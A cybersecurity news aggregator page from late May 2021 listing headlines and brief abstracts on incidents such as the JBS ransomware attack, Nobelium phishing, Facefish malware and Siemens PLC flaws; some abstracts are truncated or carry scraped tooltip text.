Link Search Menu Expand Document
BSafes Library

May, 2021

May 31, 2021 – Outage

Global meat processor JBS shuts part of operation to blunt cyberattack fallout Full Text

Abstract The company confirmed that the incident could impact customers and the supply chain, in the latest attack to target critical infrastructure.

SCMagazine

May 31, 2021 – Attack

Swedish Health Agency discloses hacking attempts Full Text

Abstract The Swedish Public Health Agency has shut down the country's infectious diseases database, SmiNet, last week after multiple hacking attempts. The Swedish Public Health Agency was forced to shut down its infectious diseases database, named SmiNet,...

Security Affairs

May 31, 2021 – Government

Denmark intel helped US NSA to spy on European politicians Full Text

Abstract Denmark’s foreign secret service allowed the US NSA to spy on European politicians through a Danish telecommunications hub. Journalists from Danish broadcaster DR recently received a document titled the Dunhammer Report, which included the findings...

Security Affairs

May 31, 2021 – Attack

Swedish Health Agency shuts down SmiNet after hacking attempts Full Text

Abstract The Swedish Public Health Agency has shut down SmiNet, the country's infectious diseases database, on Thursday after it was targeted in several hacking attempts.

BleepingComputer

May 31, 2021 – Policy and Law

Fighting, screaming as alleged ATM scammer known as ‘The Shark’ is arrested in Mexico Full Text

Abstract Law enforcement authorities in Mexico arrested the alleged head of a financial fraud operation that used infected ATMs to steal more than $1 billion from tourists in recent years.

Cyberscoop

May 31, 2021 – Government

Biden budget seeks $750 million to respond to SolarWinds compromises, plus billions more for cyber Full Text

Abstract President Joe Biden’s fiscal 2022 budget blueprint released Friday proposes $750m for the federal government to implement lessons learned from the SolarWinds hack that compromised nine agencies.

Cyberscoop

May 31, 2021 – Breach

US nuclear weapon bunker security secrets spill from online flashcards since 2013 Full Text

Abstract The leak was revealed by investigative journalism website Bellingcat, which described the findings after “simply searching online for terms publicly known to be associated with nuclear weapons.”

The Register

May 31, 2021 – Malware

Using Fake Reviews to Find Dangerous Extensions – Krebs on Security Full Text

Abstract Leaving aside the extensions which are outright fraudulent, many legitimate extensions get abandoned or sold each year to shady marketers that it’s wise to only trust actively maintained extensions.

Krebs on Security

May 31, 2021 – Phishing

Phishing for Credentials: New Tactics as COVID’s Grip Eases Full Text

Abstract The Cofense Phishing Defense Center (PDC) has observed a phishing campaign that attempts to gather login credentials from employees by acting as the Chief Information Officer (CIO).

Cofense

May 31, 2021 – Solution

Deadshot: Open source DevOps tool stops sensitive data from being uploaded to GitHub Full Text

Abstract Deadshot monitors GitHub pull requests in real-time. The open-source tool flags the potential inclusion of sensitive data in any code, as well as “changes to sensitive functionality”.

The Daily Swig

May 31, 2021 – Outage

Food giant JBS Foods shuts down production after cyberattack Full Text

Abstract JBS Foods, a leading food company and the largest meat producer globally, was forced to shut down production at multiple sites worldwide following a cyberattack.

BleepingComputer

May 31, 2021 – Government

US Says Agencies Largely Fended Off Latest Russian Hack Full Text

Abstract Officials described the cyberattack as “basic phishing” in which hackers used malware-laden emails to target the systems of U.S. and foreign government agencies, think tanks, and humanitarian groups.

Security Week

May 31, 2021 – Vulnerabilities

SonicWall Patches Command Injection Flaw in Firewall Management Application Full Text

Abstract Tracked as CVE-2021-20026 and featuring a CVSS score of 8.8, the recently patched vulnerability impacts on-premises versions of SonicWall NSM, but does not affect NSM SaaS versions.

Security Week

May 31, 2021 – Vulnerabilities

PoC published for new Microsoft PatchGuard (KPP) bypass Full Text

Abstract A security researcher has discovered a bug in PatchGuard––a crucial Windows security feature––that can allow threat actors to load unsigned (malicious) code into the Windows operating system kernel.

The Record

May 31, 2021 – Outage

Suspected Ransomware Attack Leads to Downtime at JBS Meat Processing Full Text

Abstract The world's largest meat processing company, JBS Foods, has fallen victim to cyber attacks that have shut down production around the world, including in North America, South America, and Australia.

Cybersecurity Insiders

May 31, 2021 – Privacy

Your Amazon Devices to Automatically Share Your Wi-Fi With Neighbors Full Text

Abstract Starting June 8, Amazon will automatically enable a feature on your Alexa, Echo, or other Amazon device that will share some of your Internet bandwidth with your neighbors—unless you choose to opt out. Amazon intends to register its family of hardware devices that are operational in the U.S.—including Echo speakers, Ring Video Doorbells, Ring Floodlight Cams, and Ring Spotlight Cams—into Sidewalk as it readies to roll out the shared mesh network in the country next week. Initially  announced  in September 2019,  Sidewalk  is part of Amazon's efforts to build a long-range wireless network that leverages Bluetooth, 900 MHz spectrum ( FSK ), and other frequencies to help Echo, Ring, Tile trackers Sidewalk-enabled devices communicate over the internet without Wi-Fi. Amazon is expected to flip the switch on Sidewalk in the U.S. for all capable devices by default  come June 8 , co-opting millions of devices into the network and providing near-ubiquitous connect

The Hacker News

May 31, 2021 – Vulnerabilities

Experts devised a new attack to bypass Microsoft PatchGuard Full Text

Abstract A security researcher discovered a bug in PatchGuard Windows security feature that can allow loading unsigned malicious code into the Windows kernel. Japanese researcher Kento Oki has discovered a bug in PatchGuard that could be exploited by an attacker...

Security Affairs

May 31, 2021 – Malware

Facefish Backdoor delivers rootkits to Linux x64 systems Full Text

Abstract Experts from Qihoo 360 NETLAB published details about a new backdoor, dubbed Facefish, which can be used by threat actors to steal login credentials and executing arbitrary commands on Linux systems.

Security Affairs

May 31, 2021 – General

Can Your Business Email Be Spoofed? Check Your Domain Security Now! Full Text

Abstract Are you aware of how secure your domain is? In most organizations, there is an assumption that their domains are secure and within a few months, but the truth soon dawns on them that it isn't. Spotting someone spoofing your domain name is one way to determine if your security is unsatisfactory - this means that someone is impersonating you (or confusing some of your recipients) and releasing false information. You may ask, "But why should I care?" Because these spoofing activities can potentially endanger your reputation. With so many companies being targeted by domain impersonators, email domain spoofing shouldn't be taken lightly. By doing so, they could put themselves, as well as their clients, at risk.  Your domain's security rating can make a huge difference in whether or not you get targeted by phishers looking to make money quickly or to use your domain and brand to spread ransomware without you knowing it! Check your domain's security rating with

The Hacker News

May 31, 2021 – Attack

How Ransomware Adversaries Reacted to the DarkSide Attack Full Text

Abstract CrowdStrike researchers attributes the operation of the DarkSide RaaS to CARBON SPIDER, and is a skilled eCrime (ECX) group, highly likely Eastern Europe- or Russia-based.

Crowdstrike

May 31, 2021 – Malware

Fake Streaming Service Spreads BazarLoader Full Text

Abstract Scammers have noted how subscriptions to online streaming services during the COVID-19 pandemic have skyrocketed. Proofpoint researchers expose a malspam campaign using a fake movie streaming service called BravoMovies.

Cyware Alerts - Hacker News

May 31, 2021 – Hacker

Steal Web Session Cookies From Facebook in Chrome Full Text

Abstract Cookies are simply small pieces of data that the web browser uses to for a better web surfing experience. Cookies are stored in memory and the hard drive of users' computers.

GB Hackers

May 31, 2021 – Malware

Agrius Masquerades as Ransomware in Attacks Against Israel Full Text

Abstract Experts stumbled across a new threat actor that utilizes data-wiping malware to disrupt its victims’ IT infrastructure and demand a ransom posing as ransomware actors. In addition, it is focusing its attacks on a variety of organizations based in the Middle East.

Cyware Alerts - Hacker News

May 31, 2021 – Skimming

WooCommerce Credit Card Skimmer Hides in Plain Sight Full Text

Abstract The attackers use what appears to be a Google Tag Manager script, a popular service used on many websites, to hide their malicious content, while using base64 encoding for obfuscation.

Sucuri

May 31, 2021 – Skimming

MobileInter: A Popular Magecart Skimmer Redesigned For Your Phone Full Text

Abstract With nearly three out of every four dollars spent online done via a mobile device, it's no wonder Magecart operators are looking to target this lucrative landscape using MobileInter.

Risk IQ

May 31, 2021 – Vulnerabilities

A New Bug in Siemens PLCs Could Let Hackers Run Malicious Code Remotely Full Text

Abstract Siemens on Friday shipped firmed updates to address a severe vulnerability in SIMATIC S7-1200 and S7-1500 programmable logic controllers (PLCs) that could be exploited by a malicious actor to remotely gain access to protected areas of the memory and achieve unrestricted and undetected code execution, in what the researchers describe as an attacker's "holy grail." The memory protection bypass vulnerability, tracked as CVE-2020-15782 (CVSS score: 8.1), was discovered by operational technology security company Claroty by reverse-engineering the MC7 / MC7+ bytecode language used to execute PLC programs in the microprocessor. There's no evidence that the weakness was abused in the wild. In an  advisory  issued by Siemens, the German industrial automation firm said an unauthenticated, remote attacker with network access to TCP port 102 could potentially write arbitrary data and code to protected memory areas or read sensitive data to launch further attacks. "Achie

The Hacker News

May 31, 2021 – Attack

DeepSloth: An Adversarial Attack on Machine Learning Systems Full Text

Abstract Scientists working at the University of Maryland developed a new adversarial attack that can force machine learning systems to slow down and cause critical failures. Although this technique is not yet harmful, more such devastating slowdown attacks can be discovered in the future.

Cyware Alerts - Hacker News

May 31, 2021 – Phishing

COVID-19 – Phishing attacks target employees that come back to the office Full Text

Abstract Hackers are attempting to exploit the return to the "new normal" after the governments are removing restrictions imposed in response to COVID-19. The number of COVID-19 infections are decreasing in many countries and some governments are reducing...

Security Affairs

May 30, 2021 – General

Watch out: These unsubscribe emails only lead to further spam Full Text

Abstract Scammers use fake 'unsubscribe' spam emails to confirm valid email accounts to be used in future phishing and spam campaigns.

BleepingComputer

May 30, 2021 – Government

New Russian hacks spark calls for tougher Biden actions Full Text

Abstract Officials are calling for harsher measures against Russia following Microsoft’s assessment by that hackers behind the devastating SolarWinds hack were continuing to launch cyberattacks against U.S. government agencies and other organizations. 

The Hill

May 30, 2021 – Criminals

Interpol has intercepted $83 million from financial cyber crimes Full Text

Abstract Interpol has intercepted $83 million in illicit funds transferred from victims to the accounts used by crooks. An operation conducted by Interpol, codenamed HAECHI-I, conducted by more than 40 officers in the Asia Pacific region over six months period...

Security Affairs

May 30, 2021 – Criminals

Interpol intercepts $83 million fighting financial cyber crime Full Text

Abstract The INTERPOL (short for International Criminal Police Organisation) has intercepted $83 million belonging to victims of online financial crime from being transferred to the accounts of their attackers.

BleepingComputer

May 30, 2021 – Attack

These 2 attacks allow to alter certified PDF Documents Full Text

Abstract Researchers disclosed two new attack techniques that allow modifying visible content on certified PDF documents without invalidating the digital signature. Researchers from Ruhr-University Bochum have disclosed two new attack techniques, dubbed Evil...

Security Affairs

May 30, 2021 – General

Security Affairs newsletter Round 316 Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. A malware attack hit the Alaska Health DepartmentCVE-2021-31166 Windows HTTP flaw also impacts...

Security Affairs

May 30, 2021 – Malware

Facefish Backdoor delivers rootkits to Linux x64 systems Full Text

Abstract Qihoo 360 NETLAB spotted a new backdoor dubbed Facefish that could allow attackers to take over Linux systems and steal sensitive data. Cybersecurity experts from Qihoo 360 NETLAB published details about a new backdoor, dubbed Facefish, which can be used...

Security Affairs

May 29, 2021 – Phishing

Beware: Walmart phishing attack says your package was not delivered Full Text

Abstract A Walmart phishing campaign is underway that attempts to steal your personal information and verifies your email for further phishing attacks.

BleepingComputer

May 29, 2021 – Hacker

Microsoft: Russian hackers used 4 new malware in USAID phishing Full Text

Abstract Microsoft states that a Russian hacking group used four new malware families in recent phishing attacks impersonating the United States Agency for International Development (USAID).

BleepingComputer

May 29, 2021 – Ransomware

New Epsilon Red ransomware hunts unpatched Microsoft Exchange servers Full Text

Abstract A new ransomware threat calling itself Red Epsilon has been seen leveraging Microsoft Exchange server vulnerabilities to encrypt machines across the network.

BleepingComputer

May 29, 2021 – Government

FBI will share compromised passwords with HIBP Pwned Passwords Full Text

Abstract The FBI is going to share compromised passwords discovered during investigations with Have I Been Pwned (HIBP)'s 'Pwned Passwords' service. The FBI will share compromised passwords that were discovered during investigations with the 'Pwned Passwords'...

Security Affairs

May 29, 2021 – Malware

Secure Search is a Browser Hijacker – How to Remove it Now? Full Text

Abstract Secured Search is a browser hijacker that changes your browser's settings to promote securedsearch.com, let's remove it. Secured Search is the same piece of software as ByteFence Secure Browsing. It's supposedly a tool that improves browsing security...

Security Affairs

May 29, 2021 – Hacker

The Bizarro Streaming Site That Hackers Built From Scratch Full Text

Abstract The BravoMovies campaign, spotted by researchers at security firm ProofPoint, has been around since at least early May. While many of its elements seem absurd at a glance, it shows just how far hackers are willing to go to ensnare their victims.

Wired

May 29, 2021 – Hacker

Researchers Demonstrate 2 New Hacks to Modify Certified PDF Documents Full Text

Abstract Cybersecurity researchers have disclosed two new attack techniques on certified PDF documents that could potentially enable an attacker to alter a document's visible content by displaying malicious content over the certified content without invalidating its signature. "The attack idea exploits the flexibility of PDF certification, which allows signing or adding annotations to certified documents under different permission levels,"  said  researchers from Ruhr-University Bochum, who have  systematically   analyzed  the security of the PDF specification over the years. The findings were presented at the 42nd IEEE Symposium on Security and Privacy ( IEEE S&P 2021 ) held this week. The two attacks — dubbed  Evil Annotation and Sneaky Signature attacks  — hinge on manipulating the PDF certification process by exploiting flaws in the specification that governs the implementation of digital signatures (aka approval signature) and its more flexible variant called certifica

The Hacker News

May 29, 2021 – Vulnerabilities

SonicWall fixes an NSM On-Prem bug, patch it asap! Full Text

Abstract SonicWall urges customers to address a post-authentication flaw that affects on-premises versions of the Network Security Manager (NSM). SonicWall urges customers to 'immediately' address a post-authentication vulnerability, tracked as CVE-2021-20026,...

Security Affairs

May 29, 2021 – Vulnerabilities

SonicWall fixes an NSM On-Prem bug, patch it asap! Full Text

Abstract SonicWall urged customers to ‘immediately’ address a post-authentication vulnerability, tracked as CVE-2021-20026, impacting on-premises versions of the Network Security Manager (NSM).

Security Affairs

May 29, 2021 – Government

Biden budget sets aside $750 million for SolarWinds response Full Text

Abstract U.S. President Joe Biden’s proposed budget includes $750 million for the government agencies hit by the SolarWinds hack to pay for cybersecurity improvements to prevent another attack.

Reuters

May 29, 2021 – Vulnerabilities

Siemens Patches Major PLC Flaw that Bypasses Its ‘Sandbox’ Protection Full Text

Abstract Researchers published details on a serious vulnerability they found in Siemens SIMATIC S7-1200 and S7-1500 PLCs that could allow an attacker to gain remote access to protected memory areas of the popular programmable logic controllers.

Dark Reading

May 29, 2021 – APT

Chinese APT Groups Continue to Pound Away on Pulse Secure VPNs Full Text

Abstract Multiple threat groups believed to be working in support of China's long-term economic interests are continuing to hammer away at networks belonging to organizations in the US and Europe.

Dark Reading

May 29, 2021 – Vulnerabilities

Apple Patches Flaw That Allows Sneaky Screenshots Full Text

Abstract Apple’s Big Sur 11.4 patches a security flaw that could be exploited to take screenshots, record audio and video, and access files on someone else’s Mac without their knowing.

Avast

May 28, 2021 – Hacker

Microsoft: Russian SVR hackers target govt agencies from 24 countries Full Text

Abstract The Microsoft Threat Intelligence Center (MSTIC) has discovered that the Russian-backed hackers behind the SolarWinds supply-chain attack are now coordinating an ongoing phishing campaign targeting government agencies worldwide.

BleepingComputer

May 28, 2021 – General

Hillicon Valley: Facebook to resume some political donations | Microsoft says Russian hackers utilized email system used by USAID to target other groups | Senate confirms Biden’s top scientist Full Text

Abstract Facebook said it’s resuming political donations after pausing in the wake of the Capitol insurrection, but will keep the ban in place for Republicans who voted against certifying the results of the election. Meanwhile, Microsoft said Russian hackers utilized an email system used by the State Department to target other organizations, and the Senate confirmed President BidenJoe BidenPaul Ryan: Voters won't be impressed by 'yes-men and flatterers flocking to Mar-a-Lago' Intelligence told White House they have unexamined evidence on coronavirus origins: report Milley says U.S. planning for potential evacuation of Afghan translators from region MORE’s top scientist after he faced pushback over some controversial comments and past meetings.

The Hill

May 28, 2021 – Government

Biden budget includes $750M to help agencies recover from SolarWinds hack in proposed budget Full Text

Abstract President Biden’s proposed budget for the upcoming fiscal year includes $750 million to address the ongoing fallout from the SolarWinds hack, even as lawmakers continue to press the administration to include more funding for a key cyber agency. 

The Hill

May 28, 2021 – Vulnerabilities

‘OMG it’s a bug!’ Beware the bells and whistles around vulnerability disclosures Full Text

Abstract A vulnerability disclosure shows how splashy websites, catchy names and a healthy dose of FUD can make any vulnerability sound scary.

SCMagazine

May 28, 2021 – General

Have I Been Pwned teams with FBI, gives open-source access to code Full Text

Abstract The FBI will provide breached passwords to Have I Been Pwned when they are discovered during investigations, in an effort to better inform victims of cybercrime of compromise.

SCMagazine

May 28, 2021 – Vulnerabilities

CVE-2020-15782 flaw in Siemens PLCs allows remote hack Full Text

Abstract Industrial cybersecurity firm Claroty discovered a new flaw in Siemens PLCs that can be exploited by a remote and unauthenticated attacker to hack the devices. Researchers at industrial cybersecurity firm Claroty have discovered a high-severity vulnerability...

Security Affairs

May 28, 2021 – Covid-19

Hackers Exploit Post-COVID Return to Offices Full Text

Abstract Spoofed CIO ‘pandemic guideline’ emails being used to steal credentials.

Threatpost

May 28, 2021 – Attack

Myths versus reality: Three takeaways from the Colonial Pipeline attack Full Text

Abstract Some saw Colonial Pipeline as a typical ransomware attack, albeit on a vulnerable target. Others saw this as reflective of weaknesses in the security posture of the nation’s critical infrastructure. And others felt the incident showcased inadequacies in the existing framework for public-private partnership. Here we offer a rundown of some notable characteristics and outcomes.

SCMagazine

May 28, 2021 – Government

CISA-FireEye: 16 malware families from China infect Pulse Secure VPN appliances Full Text

Abstract FireEye Mandiant, working in in tandem with Cybersecurity and Infrastructure Security Agency and Ivanti, reported details of 16 malware families exclusively designed to infect Ivanti Pulse Connect Secure VPN appliances, and used by several cyber espionage groups believed to be affiliated with the Chinese government. The blog post by Mandiant was an update to the…

SCMagazine

May 28, 2021 – Attack

SolarWinds attackers leveraged trust in Constant Contact email marketing, USAID, to launch campaign Full Text

Abstract Using a hijacked Constant Contact email marketing account of USAID, the adversaries sent phishing emails to roughly 3,000 accounts at more than 150 different organizations. About 25 percent of these targets were international development, humanitarian and human rights organizations.

SCMagazine

May 28, 2021 – Government

FBI Issues Fortinet Flash Warning Full Text

Abstract FBI: APT actors exploiting Fortinet vulnerabilities to gain access for malicious activity

Infosecurity Magazine

May 28, 2021 – Ransomware

It’s Time We Talk About JSWorm Ransomware Full Text

Abstract First discovered in 2019, the JSWorm ransomware gained infamy under several other names such as Nemty, Offwhite, and Nefilim, among others.

Cyware Alerts - Hacker News

May 28, 2021 – Policy and Law

US Jails Telemarketing Fraudster Full Text

Abstract Federal prison for fraudster who tricked Americans into thinking their computers were under attack

Infosecurity Magazine

May 28, 2021 – Denial Of Service

Mexico walls off national lottery sites after ransomware DDoS threat Full Text

Abstract Access to Mexico's Lotería Nacional and Pronósticos lottery websites are now blocked to IP addresses outside of Mexico after a ransomware gang threatened to perform denial of service attacks.

BleepingComputer

May 28, 2021 – Government

FBI Issues Flash Alert Against Conti Ransomware Full Text

Abstract The FBI has identified at least 16 Conti ransomware attacks targeting U.S. healthcare and first responder networks, such as emergency medical services, law enforcement agencies, municipalities, and 911 dispatch centers.

Cyware Alerts - Hacker News

May 28, 2021 – Phishing

SolarWinds Hackers Go Phishing Full Text

Abstract Microsoft: Nobelium is targeting governments, NGOs and think tanks with phishing campaign

Infosecurity Magazine

May 28, 2021 – Business

Salesforce Leads $120 Million Round in Israeli Cyber Startup Wiz Full Text

Abstract Salesforce led a new funding round in the Wiz, according to a person familiar with the matter. Existing investors include Greenoaks Capital, Advent International, Sequoia, and Insight Partners.

Yahoo! Finance

May 28, 2021 – Malware

Chinese cyberspies are targeting US, EU orgs with new malware Full Text

Abstract Chinese threat groups continue to deploy new malware strains on the compromised network of dozens of US and EU organizations after exploiting vulnerable Pulse Secure VPN appliances.

BleepingComputer

May 28, 2021 – General

Pharma Sector Increasingly Susceptible to Ransomware Attacks Full Text

Abstract More than 12% of pharmaceutical vendors are susceptible to suffering a ransomware attack, according to a survey by Black Kite. The average cost of cyberattacks on pharma companies per year is $31.1 million.

Cyware Alerts - Hacker News

May 28, 2021 – Vulnerabilities

SonicWall urges customers to ‘immediately’ patch NSM On-Prem bug Full Text

Abstract SonicWall urges customers to 'immediately' patch a post-authentication vulnerability impacting on-premises versions of the Network Security Manager (NSM) multi-tenant firewall management solution.

BleepingComputer

May 28, 2021 – Business

SAM Seamless Snags $20M Series B As Network Threats Grow Full Text

Abstract Israel-based SAM Seamless Network raised a $20 million Series B as the cybersecurity company readies itself for the perfect storm of an expanding network attack surface and the coming of 5G.

CrunchBase News

May 28, 2021 – Breach

Russian hackers seized email system used by State Department aid agency, human rights groups Full Text

Abstract Russian hackers seized the email system used by the State Department’s international agency and other human rights groups, Microsoft announced.

The Hill

May 28, 2021 – Malware

Researchers Warn of Facefish Backdoor Spreading Linux Rootkits Full Text

Abstract Cybersecurity researchers have disclosed a new backdoor program capable of stealing user login credentials, device information and executing arbitrary commands on Linux systems. The malware dropper has been dubbed " Facefish " by Qihoo 360 NETLAB team owing its capabilities to deliver different rootkits at different times and the use of  Blowfish  cipher to encrypt communications to the attacker-controlled server. "Facefish consists of 2 parts, Dropper and Rootkit, and its main function is determined by the Rootkit module, which works at the  Ring 3  layer and is loaded using the  LD_PRELOAD  feature to steal user login credentials by hooking ssh/sshd program related functions, and it also supports some backdoor functions," the researchers  said . The NETLAB research builds on a previous analysis  published  by Juniper Networks on April 26, which documented an attack chain targeting Control Web Panel (CWP, formerly CentOS Web Panel) to inject an SSH implant wit

The Hacker News

May 28, 2021 – General

Cyber Pros to Take Part in Charity Challenge to Help Fight Online Crime Full Text

Abstract The challenge will see 25 infosec pros walk 19,000 miles over the next six months

Infosecurity Magazine

May 28, 2021 – APT

China-linked APT groups targets orgs via Pulse Secure VPN devices Full Text

Abstract Researchers from FireEye warn that China-linked APT groups continue to target Pulse Secure VPN devices to compromise networks. Cybersecurity researchers from FireEye warn once again that Chinese APT groups continue to target Pulse Secure VPN devices...

Security Affairs

May 28, 2021 – Vulnerabilities

HPE Fixes Critical Zero-Day in Server Management Software Full Text

Abstract The bug in HPE SIM makes it easy as pie for attackers to remotely trigger code, no user interaction necessary.

Threatpost

May 28, 2021 – Ransomware

Ransomware gangs’ slow decryptors prompt victims to seek alternatives Full Text

Abstract Recently, two highly publicized ransomware victims received a decryptor that was too slow to make it effective in quickly restoring the victim's network.

BleepingComputer

May 28, 2021 – Business

DataDome raises $35M to defend ecommerce from bot attacks Full Text

Abstract Bot defense startup DataDome today announced it has raised $35 million in a Series B round led by Elephant. It aims to use the funds to invest in R&D as it looks to expand its customer base.

Venture Beat

May 28, 2021 – Policy and Law

Khanna, Mace introduce bill to strengthen federal cyber workforce following major hacks Full Text

Abstract Reps. Ro Khanna (D-Calif.) and Nancy MaceNancy MaceGOP leaders face new calls to boot Greene House Republican offers flowchart for Marjorie Taylor Greene Joe Cunningham to enter race for South Carolina governor MORE (R-S.C.) on Friday introduced legislation to strengthen the federal workforce in the wake of a year of escalating cyber threats and attacks. 

The Hill

May 28, 2021 – Criminals

SolarWinds Hackers Target Think Tanks With New ‘NativeZone’ Backdoor Full Text

Abstract Microsoft on Thursday disclosed that the threat actor behind the  SolarWinds supply chain hack  returned to the threat landscape to target government agencies, think tanks, consultants, and non-governmental organizations located across 24 countries, including the U.S. "This wave of attacks targeted approximately 3,000 email accounts at more than 150 different organizations," Tom Burt, Microsoft's Corporate Vice President for Customer Security and Trust,  said . "At least a quarter of the targeted organizations were involved in international development, humanitarian, and human rights work." Microsoft attributed the intrusions to the Russian threat actor it tracks as Nobelium, and by the wider cybersecurity community under the monikers APT29, UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (Crowdstrike), and Dark Halo (Volexity). The latest wave in a series of intrusions is said to have begun on Jan. 28, 2021, before reaching a new level of escalat

The Hacker News

May 28, 2021 – General

NCSC: Act Now to Protect Streaming Accounts Full Text

Abstract Automatic updates and password changes are required

Infosecurity Magazine

May 28, 2021 – Phishing

Microsoft details new sophisticated spear-phishing attacks from NOBELIUM Full Text

Abstract Microsoft experts uncovered a wide-scale malicious email campaign operated by NOBELIUM, the threat actor behind SolarWinds hack. Microsoft Threat Intelligence Center (MSTIC) has uncovered a wide-scale malicious email campaign conducted by NOBELIUM...

Security Affairs

May 28, 2021 – General

Building Multilayered Security for Modern Threats Full Text

Abstract Justin Jett, director of audit and compliance for Plixer, discusses the elements of a successful advanced security posture.

Threatpost

May 28, 2021 – Criminals

Microsoft: SolarWinds hackers target govt agencies from 24 countries Full Text

Abstract The Microsoft Threat Intelligence Center (MSTIC) has discovered that the Russian-based SolarWinds hackers are behind an ongoing phishing campaign targeting government agencies worldwide.

BleepingComputer

May 28, 2021 – Ransomware

New Golang-based Epsilon Red Ransomware Leverages PowerShell Scripts for Malicious Objectives Full Text

Abstract The malware was delivered as the final executable payload in a hand-controlled attack against a US-based business in the hospitality industry with early-stage components in form of PowerShell scripts.

Sophos

May 28, 2021 – Hacker

Chinese Cyber Espionage Hackers Continue to Target Pulse Secure VPN Devices Full Text

Abstract Cybersecurity researchers from FireEye unmasked additional tactics, techniques, and procedures (TTPs) adopted by Chinese threat actors who were recently found abusing Pulse Secure VPN devices to drop malicious web shells and exfiltrate sensitive information from enterprise networks. FireEye's Mandiant threat intelligence team, which is tracking the cyberespionage activity under two threat clusters UNC2630 and UNC2717,  said  the intrusions line up with key Chinese government priorities, adding "many compromised organizations operate in verticals and industries aligned with Beijing's strategic objectives outlined in China's recent  14th Five Year Plan ." On April 20, the cybersecurity firm  disclosed  12 different malware families, including STEADYPULSE and LOCKPICK, that have been designed with the express intent to infect Pulse Secure VPN appliances and put to use by several cyberespionage groups believed to be affiliated with the Chinese government. UNC263

The Hacker News

May 28, 2021 – General

Alert Overload Distressing 70% of SecOps Teams Full Text

Abstract Stress leads many to walk away from their computer or switch off alerts

Infosecurity Magazine

May 28, 2021 – Attack

Canada Post disclosed a ransomware attack on a third-party service provider Full Text

Abstract Canada Post disclosed a ransomware attack on a third-party service provider that exposed shipping information for their customers. Canada Post announced that a ransomware attack on a third-party service provider exposed shipping information for their...

Security Affairs

May 28, 2021 – Government

FBI to share compromised passwords with Have I Been Pwned Full Text

Abstract The FBI will soon begin to share compromised passwords with Have I Been Pwned's 'Password Pwned' service that were discovered during law enforcement investigations.

BleepingComputer

May 28, 2021 – APT

Updates on Chinese APT Actors Compromising Pulse Secure VPN Devices Full Text

Abstract Mandiant identified 16 malware families exclusively designed to infect Pulse Secure VPN appliances and used by several cyberespionage groups which are believed to be linked to the Chinese government.

FireEye

May 28, 2021 – General

Three-Quarters of Infosec Pros Concerned About Next SolarWinds Full Text

Abstract Supply chain risk a major worry, finds Infosecurity Europe poll

Infosecurity Magazine

May 28, 2021 – APT

Microsoft Suspects Russia’s Cozy Bear APT Behind Attack Against U.S. Aid Agency Full Text

Abstract By breaching the systems of a supplier used by the federal government, the hackers sent out genuine-looking emails to more than 3,000 accounts across more than 150 organizations linked to USAID.

New York Times

May 28, 2021 – General

Token Resistance: Tackling the New NFT Threat Landscape Full Text

Abstract Beyond the massive cost for many of these crypto tokens, there’s also the issue of theft; if accounts are compromised and NFTs stolen, they could be sold to the highest bidder.

Security Intelligence

May 27, 2021 – Breach

Canada Post hit by data breach after supplier ransomware attack Full Text

Abstract Canada Post has informed 44 of its large commercial customers that a ransomware attack on a third-party service provider exposed shipping information for their customers.

BleepingComputer

May 27, 2021 – Criminals

How North Korean Threat Actors Pulled Off Multimillion-Dollar Heists? Full Text

Abstract ClearSky attributed multiple attacks on cryptocurrency exchanges to a threat actor, dubbed CryptoCore, and linked its activities with Lazarus. It swindled hundreds of millions of dollars from the U.S., Israel, Europe, and Japan over the past three years.

Cyware Alerts - Hacker News

May 27, 2021 – General

Hillicon Valley: TSA formally directs pipeline companies to report cybersecurity incidents in wake of Colonial attack | Tech trade groups sue Florida over new social media law Full Text

Abstract The Transportation Security Administration issued a security directive Thursday to strengthen federal cybersecurity oversight of pipelines following the attack on the Colonial Pipeline. Meanwhile, the Senate Judiciary antitrust subcommittee announced a series of hearings slated for the summer, and tech trade groups are suing Florida over a bill that aims to prohibit social media companies from banning politicians. 

The Hill

May 27, 2021 – Malware

Malvertising Campaign On Google Distributed Trojanized AnyDesk Installer Full Text

Abstract Cybersecurity researchers on Wednesday publicized the disruption of a "clever" malvertising network targeting AnyDesk that delivered a weaponized installer of the remote desktop software via rogue Google ads that appeared in the search engine results pages. The campaign, which is believed to have begun as early as April 21, 2021, involves a malicious file that masquerades as a setup executable for AnyDesk (AnyDeskSetup.exe), which, upon execution, downloads a PowerShell implant to amass and exfiltrate system information. "The script had some obfuscation and multiple functions that resembled an implant as well as a hardcoded domain (zoomstatistic[.]com) to 'POST' reconnaissance information such as user name, hostname, operating system, IP address and the current process name," researchers from Crowdstrike  said  in an analysis. AnyDesk's remote desktop access solution has been  downloaded  by more than 300 million users worldwide, according to the co

The Hacker News

May 27, 2021 – Policy and Law

Hacker Who Targeted Cops Gets Jail Time Full Text

Abstract New Hampshire hacker behind bars after targeting Auburn Police Department

Infosecurity Magazine

May 27, 2021 – Cryptocurrency

The Ransomware Problem Is a Bitcoin Problem Full Text

Abstract The best way to deal with this new era of big-game ransomware will involve not just securing computer systems or prosecuting criminals, but  disrupting the one payment channel capable of moving millions at a time outside of money laundering laws: Bitcoin and other cryptocurrencies.

Lawfare

May 27, 2021 – APT

APT hacked a US municipal government via an unpatched Fortinet VPN Full Text

Abstract The FBI revealed that foreign hackers compromised the network of a local US municipal government by exploiting flaws in an unpatched Fortinet VPN. The Federal Bureau of Investigation (FBI) reported that an APT group had breached the network of a local...

Security Affairs

May 27, 2021 – Attack

Is the attack on Fujitsu’s ProjectWEB SaaS platform the next big supply chain attack? Full Text

Abstract While it’s still early, some researchers view the reported hacking into Fujitsu’s ProjectWEB software-as-a-service (SaaS) platform as as a nation-state attack not unlike the one that targeted the SolarWinds supply chain.

SCMagazine

May 27, 2021 – Malware

Targeted AnyDesk Ads on Google Served Up Weaponized App Full Text

Abstract Malicious ad campaign was able to rank higher in searches than legitimate AnyDesk ads.

Threatpost

May 27, 2021 – APT

FBI: APT hackers breached US local govt by exploiting Fortinet bugs Full Text

Abstract The Federal Bureau of Investigation (FBI) says the webserver of a US municipal government was breached by state-sponsored attackers after hacking a Fortinet appliance.

BleepingComputer

May 27, 2021 – Ransomware

Zeppelin Ransomware Begins a New Ride Full Text

Abstract After a hiatus, Zeppelin ransomware, a possible variant of the Vega Ransomware-as-a-Service (RaaS), is active again. Without stepping into the trend of double extortion, it can still cause serious damage to victims' systems.

Cyware Alerts - Hacker News

May 27, 2021 – Government

3 GOP senators come out against Biden intelligence nominee over Huawei ties Full Text

